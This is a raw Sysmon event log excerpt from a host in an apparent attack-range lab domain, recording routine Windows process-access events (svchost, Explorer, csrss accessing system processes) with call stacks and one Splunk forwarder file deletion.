10341000x80000000000000001055770Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.196{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055769Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.196{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055768Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.196{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055767Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.196{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055766Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.196{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055765Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.196{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055764Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.181{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3dff|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001055763Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.181{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3dff|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 23542300x80000000000000001055762Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.165{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A285EB3F5E20F6F2C002C6050D3C15C,SHA256=C8FD5AA3779DF7D5B4BFA2BE34CB260AD086FD38D02D2E4286491066F9700191,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055761Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.118{5EBD8912-8D26-6151-8500-00000000FD01}27603956C:\Windows\system32\csrss.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055760Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.118{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+f997|C:\Windows\SYSTEM32\psmserviceexthost.dll+fa9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1279f|C:\Windows\SYSTEM32\psmserviceexthost.dll+16992|C:\Windows\SYSTEM32\resourcepolicyserver.dll+15142|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11b0c|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b955|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001055759Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.118{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+3844|C:\Windows\SYSTEM32\psmserviceexthost.dll+1470c|C:\Windows\SYSTEM32\psmserviceexthost.dll+f933|C:\Windows\SYSTEM32\psmserviceexthost.dll+fa9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1279f|C:\Windows\SYSTEM32\psmserviceexthost.dll+16992|C:\Windows\SYSTEM32\resourcepolicyserver.dll+15142|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11b0c|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b955|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000001055758Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.118{5EBD8912-8D29-6151-8D00-00000000FD01}41364216C:\Windows\system32\sihost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+47ca8|C:\Windows\System32\modernexecserver.dll+47c41|C:\Windows\System32\modernexecserver.dll+19c8a|C:\Windows\System32\modernexecserver.dll+1f6f8|C:\Windows\SYSTEM32\twinapi.appcore.dll+32a67|C:\Windows\SYSTEM32\twinapi.appcore.dll+32870|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055757Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.118{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5266|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055756Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.118{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+521d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000001055755Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.118{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+521d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001055754Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.118{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+47a7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001055753Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.118{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+47a7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000001055752Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.118{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055751Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.118{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055750Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.118{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055749Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.118{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055748Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.118{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 